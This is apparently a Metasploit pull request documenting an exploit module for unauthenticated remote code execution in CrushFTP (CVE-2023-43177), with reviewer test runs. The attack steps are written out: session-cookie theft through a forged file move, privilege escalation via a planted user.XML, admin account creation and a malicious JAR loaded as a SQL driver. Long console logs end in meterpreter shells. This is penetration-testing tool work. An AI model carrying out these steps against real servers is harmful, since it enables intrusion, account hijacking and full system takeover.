CrushFTP unauthenticated RCE (CVE-2023-43177)

[cdelafuente-r7]

This exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1.

It is possible to set some user's session properties by sending an HTTP request with specially crafted Header key-value pairs. This enables an unauthenticated attacker to access files anywhere on the server file system and steal the session cookies of valid authenticated users. The attack consists in hijacking a user's session and escalates privileges to obtain full control of the target. Remote code execution is obtained by abusing the dynamic SQL driver loading and configuration testing feature.

Attack Details

The module will first get an anonymous session by querying an non-existing page and set a few session properties through specifically crafted HTTP headers. The user_log_file, user_log_path and user_log_path_custom properties are set in a way that results in moving any file to any location on the server. This primitive is used to retrieve the CrushFTP cache session file (sessions.obj), which contains all the active session cookies.

From there, the module will check if one of these session cookies belongs to an administrator and upload a payload (.jar file) to a temporary location on the server. It will then send a request to the testDB API, specifying the path of the SQL driver pointing to the payload. This will result in the execution of the payload in the context of the user running CrushFTP, usually root on Linux or SYSTEM on Windows.

In case no administrator sessions are found in the session file, the module will attempt to escalate privileges of any non-administrative sessions. It will abuse the fact that CrushFTP supports filesystem-based accounts, which are defined in folders containing a user.XML file. This is done by taking advantage of the arbitrary file move primitive to upload and move a specifically crafted user.XML file to the right location.

Note that since the session cookies and other information are retrieved from the CrushFTP session file and because this file is created by the server every 10 minutes approximately, the module will attempt to download it repeatedly every 30 seconds by default (can be changed by setting the SESSION_FILE_DELAY option).

More details on these techniques here.

Install CrushFTP

Download and follow the installation steps from the official website (https://www.crushftp.com/download.html).

Setup a new user to test the privilege escalation attack (optional)

This module can be tested with only an administrator logged into the application. To test the privilege escalation attack, a non-administrator user needs to be set up.

• Click on Admin and User Management.
• Click the + Add button to create a new user (provide a username and a password).
• With this new user selected, in the User Settings pane, select a location in the server file system that will be the root directory for this user. You can create a new folder by clicking the first button on the left hand side. Go ahead and create multiple subdirectories also.
• Drag & drop the root folder from the left pane to the right pane and navigate to a folder you want to be writable. The root folder and its subfolders are read-only by default. Once you pick one folder, select the Upload and Delete permissions on the right hand side.
• Click Save.

Verification Steps

1. Start msfconsole
2. Do: use multi/http/crushftp_rce_cve_2023_43177
3. Do: set target <target>
4. Do: set payload <payload>
5. Do: run rhosts=<target address>

You will need to have an active user's session on the server. For this, you can log into the application with an administrator account or with a non-privileged user. The latter will trigger the privilege escalation routine.
Since the module needs to download the cache session file one or two times, depending on if privilege escalation is required, this can take up to 20 minutes to get remote code execution. So, make sure the user that is authenticated has not logged out or the session timed out until the exploit finishes.

Scenarios

Target 0 (Java) against CrushFTP version 10.5.0_3 on Windows

With an active administrator session

msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > exploit rhosts=192.168.101.54 verbose=true
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711129530820_ogdYwds2NKkSxZoAGigNyNLtyFrphL
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711129530820_ogdYwds2NKkSxZoAGigNyNLtyFrphL`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711129532554_mudHsRJWeg1AH7x0PyZzux9uffDBOr
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_9bce0d5c08-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711129532554_mudHsRJWeg1AH7x0PyZzux9uffDBOr`
[*] Looking for the valid sessions
[*] Found 4 session cookies in the session file
[*] Cookie `1711129187087_HwakJiMBcOOnUrEbe6hgbTuwqH7UVZ` is valid session (username: crushadmin)
[*] Cookie `1711115282718_bh0KMR52mszSUEnVJT7u699mcIIlf3` is not valid
[*] Cookie `1711115284720_HC3QlMqFXpqoY4iSEYzXUJOThVD7SX` is not valid
[*] Cookie `1711115283356_XYu6nd3kaL4zcjtOurFUNXknYprRmu` is not valid
[*] Checking if user crushadmin is an admin (cookie: 1711129187087_HwakJiMBcOOnUrEbe6hgbTuwqH7UVZ)
[+] It is an admin! Let's create a temporary admin account
[+] Administrator account created: username=f605ec51de, password=e5864cea12
[*] [do_login] Logging in with username `f605ec51de` and password `e5864cea12`
[*] Uploading payload .jar file `c32e.jar` to C:/Users/Public/c32e.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Started bind TCP handler against 192.168.101.54:4444
[*] Sending stage (57971 bytes) to 192.168.101.54
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_9bce0d5c08-js
[*] Meterpreter session 11 opened (10.4.227.33:57574 -> 192.168.101.54:4444) at 2024-03-22 18:46:25 +0100
[!] This exploit may require manual cleanup of 'C:/Users/Public/c32e.jar' on the target
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer        : SRV-STD
OS              : Windows Server 2022 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows

With an active non-privileged session (privilege escalation)

msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > exploit rhosts=192.168.101.54 verbose=true
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711130383791_FsmZz0FlGiiiYLl7V8qhICxtzfmQLN
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711130383791_FsmZz0FlGiiiYLl7V8qhICxtzfmQLN`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711130385529_gfYIp4KJlwx6R5dy1JWcLhZZq9rOJS
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_9f9371966b-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711130385529_gfYIp4KJlwx6R5dy1JWcLhZZq9rOJS`
[*] Looking for the valid sessions
[*] Found 1 session cookies in the session file
[*] Cookie `1711130148838_IQCFIDkPBuRaLAVq2KI9D1hAlfgh0T` is valid session (username: msfuser)
[*] Checking if user msfuser is an admin (cookie: 1711130148838_IQCFIDkPBuRaLAVq2KI9D1hAlfgh0T)
[*] Could not find any admin session or the admin account creation failed
[*] Attempting privilege escalation with session cookie {:cookie=>"1711130148838_IQCFIDkPBuRaLAVq2KI9D1hAlfgh0T", :username=>"msfuser"}
[*] Looking for a directory with write permissions
[+] Found a writable directory: /home/readonly/writable1
[*] Uploading the egg file `4daf4b7923`
[*] Uploading `user.XML` to /home/readonly/writable1/user.XML
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711130396337_KcYDlC0SZA19Z2uiWqw8dDyU0bVMO1
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_9f9371966b-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711130396337_KcYDlC0SZA19Z2uiWqw8dDyU0bVMO1`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711130429011_YzjufB5IlVeRSuqRdcJdMjXfDWBQwx
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_9f9371966b-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711130429011_YzjufB5IlVeRSuqRdcJdMjXfDWBQwx`
[*] Found the egg at FILE://C:/CrushFTP10/home/readonly/writable1/4daf4b7923 in the session file
[+] Found path `C:/CrushFTP10/home/readonly/writable1/` and it is Windows
[+] Found the file system path: C:/CrushFTP10/home/readonly/writable1/
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711130431330_KQjve6ieSt8nNrl4uJ5L7vmVmsEXsD
[*] The forged user will be `4a5b85eeb9`
[*] Moving user.XML from C:/CrushFTP10/home/readonly/writable1/ to `4a5b85eeb9` home folder and elevate privileges
[*] Logging out session cookie `1711130431330_KQjve6ieSt8nNrl4uJ5L7vmVmsEXsD`
[*] Logging into the elevated account
[*] [do_login] Logging in with username `4a5b85eeb9` and password `9adccf3732`
[+] Logged in! Now let's create a temporary admin account
[*] Logging out session cookie `1711130433073_bRLLcJRdeSHJTIEcRAOpMKzMYL0zLa`
[+] Administrator account created: username=ec71181f81, password=63524a9c6c
[*] [do_login] Logging in with username `ec71181f81` and password `63524a9c6c`
[*] Uploading payload .jar file `ea2c.jar` to C:/Users/Public/ea2c.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Started bind TCP handler against 192.168.101.54:4444
[*] Sending stage (57971 bytes) to 192.168.101.54
[+] Deleted C:/CrushFTP10/home/readonly/writable1/4daf4b7923
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_9f9371966b-js
[*] Meterpreter session 12 opened (10.4.227.33:61332 -> 192.168.101.54:4444) at 2024-03-22 19:00:49 +0100
[!] This exploit may require manual cleanup of 'C:/Users/Public/ea2c.jar' on the target
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer        : SRV-STD
OS              : Windows Server 2022 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows

Target 0 (Java) against CrushFTP version 10.5.0_3 on Linux

With an active administrator session

msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > exploit rhosts=192.168.101.96 verbose=true
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711130989170_opHdY12lePB0nORZlJxUqdgU9zEBuZ
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711130989170_opHdY12lePB0nORZlJxUqdgU9zEBuZ`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711130990882_In2JvArUAjORTeJGGXf67Ql3gpUMC8
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_040ed0cbc9-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711130990882_In2JvArUAjORTeJGGXf67Ql3gpUMC8`
[*] Looking for the valid sessions
[*] Found 1 session cookies in the session file
[*] Cookie `1711130936989_ZongxaZC0kfML3XvdU3d2RSL6CG76D` is valid session (username: crushadmin)
[*] Checking if user crushadmin is an admin (cookie: 1711130936989_ZongxaZC0kfML3XvdU3d2RSL6CG76D)
[+] It is an admin! Let's create a temporary admin account
[+] Administrator account created: username=998a245fc4, password=28d3804cfd
[*] [do_login] Logging in with username `998a245fc4` and password `28d3804cfd`
[*] Uploading payload .jar file `d204.jar` to /var/tmp/d204.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Started bind TCP handler against 192.168.101.96:4444
[*] Sending stage (57971 bytes) to 192.168.101.96
[+] Deleted /var/tmp/d204.jar
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_040ed0cbc9-js
[*] Meterpreter session 13 opened (10.4.227.33:63705 -> 192.168.101.96:4444) at 2024-03-22 19:10:03 +0100
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ip-10-10-0-10
OS              : Linux 6.5.0-1014-aws (amd64)
Architecture    : x64
System Language : en
Meterpreter     : java/linux

With an active non-privileged session (privilege escalation)

msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > exploit rhosts=192.168.101.96 verbose=true
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711131564348_M6LZ3JOkdP3AHww0Xsr8nVdNLVDPOv
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711131564348_M6LZ3JOkdP3AHww0Xsr8nVdNLVDPOv`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711131566040_JXiaRnA4jAMCIqnwiSbWGxPf7pAzHD
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_4cf0853fb7-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711131566040_JXiaRnA4jAMCIqnwiSbWGxPf7pAzHD`
[*] Looking for the valid sessions
[*] Found 1 session cookies in the session file
[*] Cookie `1711131525923_krJ319nYz6GDz4VXkOfUQjbkHzaG0F` is valid session (username: msfuser)
[*] Checking if user msfuser is an admin (cookie: 1711131525923_krJ319nYz6GDz4VXkOfUQjbkHzaG0F)
[*] Could not find any admin session or the admin account creation failed
[*] Attempting privilege escalation with session cookie {:cookie=>"1711131525923_krJ319nYz6GDz4VXkOfUQjbkHzaG0F", :username=>"msfuser"}
[*] Looking for a directory with write permissions
[+] Found a writable directory: /home/readonly/writable1
[*] Uploading the egg file `e5d3f50f45`
[*] Uploading `user.XML` to /home/readonly/writable1/user.XML
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711131576980_gK0M9IhcvhrhXVrAwRqS1rd8ESJ7ry
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_4cf0853fb7-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711131576980_gK0M9IhcvhrhXVrAwRqS1rd8ESJ7ry`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711131609587_sKMgxtPNJg78LMAQkx7uLVEOUGyD4G
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_4cf0853fb7-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711131609587_sKMgxtPNJg78LMAQkx7uLVEOUGyD4G`
[*] Found the egg at FILE://home/ubuntu/CrushFTP10/home/readonly/writable1/e5d3f50f45 in the session file
[+] Found path `/home/ubuntu/CrushFTP10/home/readonly/writable1/` and it is Unix-like
[+] Found the file system path: /home/ubuntu/CrushFTP10/home/readonly/writable1/
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711131611903_PY71NprjquBlrPlZhYdnyk5JHGNfzo
[*] The forged user will be `9721e30b7c`
[*] Moving user.XML from /home/ubuntu/CrushFTP10/home/readonly/writable1/ to `9721e30b7c` home folder and elevate privileges
[*] Logging out session cookie `1711131611903_PY71NprjquBlrPlZhYdnyk5JHGNfzo`
[*] Logging into the elevated account
[*] [do_login] Logging in with username `9721e30b7c` and password `7ae6ef77cf`
[+] Logged in! Now let's create a temporary admin account
[*] Logging out session cookie `1711131613590_9nhaTwXZIH9hpyGCnJkgCd9vKAZrEI`
[+] Administrator account created: username=4c07767049, password=1267096390
[*] [do_login] Logging in with username `4c07767049` and password `1267096390`
[*] Uploading payload .jar file `926f.jar` to /var/tmp/926f.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Started bind TCP handler against 192.168.101.96:4444
[*] Sending stage (57971 bytes) to 192.168.101.96
[+] Deleted /home/ubuntu/CrushFTP10/home/readonly/writable1/e5d3f50f45
[+] Deleted /var/tmp/926f.jar
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_4cf0853fb7-js
[*] Meterpreter session 14 opened (10.4.227.33:50007 -> 192.168.101.96:4444) at 2024-03-22 19:20:23 +0100
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ip-10-10-0-10
OS              : Linux 6.5.0-1014-aws (amd64)
Architecture    : x64
System Language : en
Meterpreter     : java/linux

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[jheysel-r7]

Great module @cdelafuente-r7. A very clean implementation of a complex exploit 👏 A couple minor nitpicks.

Testing went smoothly on both Windows and Linux. Testing the non-administrative user session on Linux took a couple tries because of a cached admin cookie although not a bad problem to have (the module wouldn't stop taking it's most efficient code path).

Windows

Admin User

msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Downloading the session file
[+] Session file downloaded
[*] Looking for the valid sessions
[*] Checking if user crushadmin is an admin (cookie: 1711571844199_Lom80xw3xbjL50Y7mBFI1mC1tK0v7k)
[+] It is an admin! Let's create a temporary admin account
[+] Administrator account created: username=993d861677, password=d44916df5c
[*] Uploading payload .jar file `5191.jar` to C:/Users/Public/5191.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Sending stage (57971 bytes) to 172.16.199.131
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_ff3f5f2020-js
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:50421) at 2024-03-27 13:49:57 -0700
[!] This exploit may require manual cleanup of 'C:/Users/Public/5191.jar' on the target

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : DESKTOP-N3ORU31
OS              : Windows 10 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows

Non-privileged User

msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711574408402_4PHT1TDv7BpatlfY7f00JtQNEjhL4T
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711574408402_4PHT1TDv7BpatlfY7f00JtQNEjhL4T`
[+] The target appears to be vulnerable.
[*] Downloading the session file

<redacted>

[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711574716304_OxUot9xce5Ra0yd3rCY0LohgD2mkHK`
[*] Looking for the valid sessions
[*] Found 123 session cookies in the session file
[*] Cookie `1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5` is valid session (username: testuser)
[*] Cookie `1711573381058_LvTXbIZGcmx9qJ8tmiXmYxQb60dlRI` is not valid

<redacted>

[*] Cookie `1711574700714_5IFxQf2vgKr5tOGkKOdrUlpJjJQCZz` is not valid
[*] Checking if user testuser is an admin (cookie: 1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5)
[*] Could not find any admin session or the admin account creation failed
[*] Attempting privilege escalation with session cookie {:cookie=>"1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5", :username=>"testuser"}
[*] Looking for a directory with write permissions
[+] Found a writable directory: /testing
[*] Uploading the egg file `190438929f`
[*] Uploading `user.XML` to /testing/user.XML
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711574721227_y3TKeeMFVqbr14yU23zctJ5HhBYCXZ
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711574721227_y3TKeeMFVqbr14yU23zctJ5HhBYCXZ`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)

<redacted> 

[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711575332543_afV8HRseYl2E1rIu0Q6IWchgKQ1z9b
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711575332543_afV8HRseYl2E1rIu0Q6IWchgKQ1z9b`
[*] Found the egg at FILE://C:/Users/msfuser/Desktop/testing/190438929f in the session file
[+] Found path `C:/Users/msfuser/Desktop/testing/` and it is Windows
[+] Found the file system path: C:/Users/msfuser/Desktop/testing/
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711575332746_UvjzcSwGj1oWrnViKe50Opay2NjrpX
[*] The forged user will be `5ef2802132`
[*] Moving user.XML from C:/Users/msfuser/Desktop/testing/ to `5ef2802132` home folder and elevate privileges
[*] Logging out session cookie `1711575332746_UvjzcSwGj1oWrnViKe50Opay2NjrpX`
[*] Logging into the elevated account
[*] [do_login] Logging in with username `5ef2802132` and password `c9f35fc21b`
[+] Logged in! Now let's create a temporary admin account
[*] Logging out session cookie `1711575332924_qI4Y5cdGLXWWGESFv0O37Xd3XLjcwc`
[+] Administrator account created: username=12d0ab650f, password=b4e7b73d9b
[*] [do_login] Logging in with username `12d0ab650f` and password `b4e7b73d9b`
[*] Uploading payload .jar file `143e.jar` to C:/Users/Public/143e.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711575333206_F4qLTAR1lf7aeqjUqxazbw6mcDcSrW`
[*] Sending stage (57971 bytes) to 172.16.199.131
[+] Deleted C:/Users/msfuser/Desktop/testing/190438929f
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_27958456ca-js
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:50703) at 2024-03-27 14:35:37 -0700
[!] This exploit may require manual cleanup of 'C:/Users/Public/143e.jar' on the target

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : DESKTOP-N3ORU31
OS              : Windows 10 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
meterpreter >

Linux

Admin User

msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711578276060_TIJ7sl1znsmDxuJNRkZr9SzrruwuFz
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711578276060_TIJ7sl1znsmDxuJNRkZr9SzrruwuFz`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711578276124_GCT660ZyH3GRFjqBoG1JrVCaGZaZWA
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_261c9456a4-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711578276124_GCT660ZyH3GRFjqBoG1JrVCaGZaZWA`
[*] Looking for the valid sessions
[*] Found 2 session cookies in the session file
[*] Cookie `1711578219100_DfSoK3LJBwE6H9jI6On9HFgRCGKPcO` is valid session (username: crushadmin)
[*] Cookie `1711577623584_vO7e9cCuVtVC6DQdtYwEdqvGthXYtW` is valid session (username: crushadmin)
[*] Checking if user crushadmin is an admin (cookie: 1711578219100_DfSoK3LJBwE6H9jI6On9HFgRCGKPcO)
[+] It is an admin! Let's create a temporary admin account
[+] Administrator account created: username=0a9a861e09, password=9e6fb1989e
[*] [do_login] Logging in with username `0a9a861e09` and password `9e6fb1989e`
[*] Uploading payload .jar file `13a3.jar` to /var/tmp/13a3.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711578276318_D6ETTPhAHT1BtEOp0L6Fc8SPRC2HEV`
[*] Sending stage (57971 bytes) to 172.16.199.132
[+] Deleted /var/tmp/13a3.jar
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_261c9456a4-js
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:39168) at 2024-03-27 15:24:08 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : msfuser-virtual-machine
OS              : Linux 6.5.0-26-generic (amd64)
Architecture    : x64
System Language : en_CA
Meterpreter     : java/linux
meterpreter >

Non-privileged User

msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643752950_wr08JKNW4N02kxnI76XmLqmltD5KvI
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711643752950_wr08JKNW4N02kxnI76XmLqmltD5KvI`
[*] Looking for the valid sessions
[*] Found 0 session cookies in the session file
[*] No valid sessions found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643783883_jVe9eZS1bX1UmpJHnvf8OuLiRRcRXO
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711643783883_jVe9eZS1bX1UmpJHnvf8OuLiRRcRXO`
[*] Looking for the valid sessions
[*] Found 93 session cookies in the session file
[*] Cookie `1711643749455_SVZvsOplN6LhuTjYlZ8Py9CySaSLXS` is an anonymous session
[*] Cookie `1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj` is valid session (username: testuser)
[*] Cookie `1711579574357_zeud0fWqHSpBUzJA91u98rZrcaHfqy` is not valid

<redacted>

[*] Cookie `1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz` is not valid
[*] Checking if user testuser is an admin (cookie: 1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj)
[*] Could not find any admin session or the admin account creation failed
[*] Attempting privilege escalation with session cookie {:cookie=>"1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj", :username=>"testuser"}
[*] Looking for a directory with write permissions
[+] Found a writable directory: /Desktop
[*] Uploading the egg file `2638fb4da2`
[*] Uploading `user.XML` to /Desktop/user.XML
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643785469_DgrqaZSqWo0f6YcHAHnj7S5ntsknk0
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643785469_DgrqaZSqWo0f6YcHAHnj7S5ntsknk0`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643816398_6h4OUT85KRVs86hUbpqQL7tXiraZms
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643816398_6h4OUT85KRVs86hUbpqQL7tXiraZms`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643847292_Ns6cFYAlmJRe5DIRiLLDlWBHNhs5SC
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643847292_Ns6cFYAlmJRe5DIRiLLDlWBHNhs5SC`

<redacted>

[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711644456188_iuq4kvxnsdAO7PkXvMkamEhmUWF5RR
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711644456188_iuq4kvxnsdAO7PkXvMkamEhmUWF5RR`
[*] Found the egg at FILE://home/msfuser/Desktop/2638fb4da2 in the session file
[+] Found path `/home/msfuser/Desktop/` and it is Unix-like
[+] Found the file system path: /home/msfuser/Desktop/
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711644456289_G9RUPhsOQt9nobO2lWFyi3bPfgj0Au
[*] The forged user will be `db13909bb2`
[*] Moving user.XML from /home/msfuser/Desktop/ to `db13909bb2` home folder and elevate privileges
[*] Logging out session cookie `1711644456289_G9RUPhsOQt9nobO2lWFyi3bPfgj0Au`
[*] Logging into the elevated account
[*] [do_login] Logging in with username `db13909bb2` and password `ba82144d38`
[+] Logged in! Now let's create a temporary admin account
[*] Logging out session cookie `1711644456342_fguw9t7QiTEMnEZHjL56Z65ryFqt5j`
[+] Administrator account created: username=941449f87d, password=c90677b4b1
[*] [do_login] Logging in with username `941449f87d` and password `c90677b4b1`
[*] Uploading payload .jar file `49a4.jar` to /var/tmp/49a4.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711644456487_GXEtswO3Y70GSItRFaz4oCd5oZXjK0`
[*] Sending stage (57971 bytes) to 172.16.199.132
[+] Deleted /home/msfuser/Desktop/2638fb4da2
[+] Deleted /var/tmp/49a4.jar
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_53918e3561-js
[*] Meterpreter session 7 opened (172.16.199.1:4444 -> 172.16.199.132:34056) at 2024-03-28 09:47:08 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : msfuser-virtual-machine
OS              : Linux 6.5.0-26-generic (amd64)
Architecture    : x64
System Language : en_CA
Meterpreter     : java/linux
meterpreter >

[jheysel-r7]

Very minor but is setting cookie = nil here necessary? It's already been initialized in this context and on line 461 do_login is going to set cookie to either nil or the cookie found during authentication.

Suggested change

cookie = nil

[cdelafuente-r7]

cookie is explicitly set to nil here to make sure the ensure block won't log it out again if the next call to do_login(admin_username, admin_password) raises an exception. Without this line, if do_login raises an exception, cookie will still contain the value of the previous session cookie, which should have been logged out at this point. The ensure block will try to logout the same session again.

I'll add a comment to explain this. Thank you for bringing this to my attention, I agree it is not clear in the code.

[cdelafuente-r7]

Thank you @jheysel-r7 for your review! I think I have addresses all your comments in the last commit.

[jheysel-r7]

Release Notes

This exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1.